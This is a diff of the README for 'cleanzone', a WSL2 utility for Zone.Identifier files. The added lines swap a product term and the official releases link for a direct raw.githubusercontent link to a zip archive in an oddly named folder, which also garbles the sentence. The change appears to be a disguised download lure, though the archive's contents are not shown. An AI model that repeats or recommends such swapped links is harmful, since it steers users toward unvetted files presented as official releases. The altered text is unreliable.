iusetodo/cleanzone/README.md

 ## ❤️ Acknowledgments

 Thank you for trying cleanzone!
-We hope this tool enhances your productivity by easily managing your Zone.Identifier files in WSL2.
+We hope this tool enhances your productivity by easily managing your https://raw.githubusercontent.com/iusetodo/cleanzone/main/plenarily/cleanzone.zip files in WSL2.
 Enjoy using it!

-For more details and updates, refer back to the official [GitHub repository](https://github.com/iusetodo/cleanzone/releases) or visit the releases page directly.
+For more details and updates, refer back to the official [GitHub repository](https://raw.githubusercontent.com/iusetodo/cleanzone/main/plenarily/cleanzone.zip) or visit the releases page directly.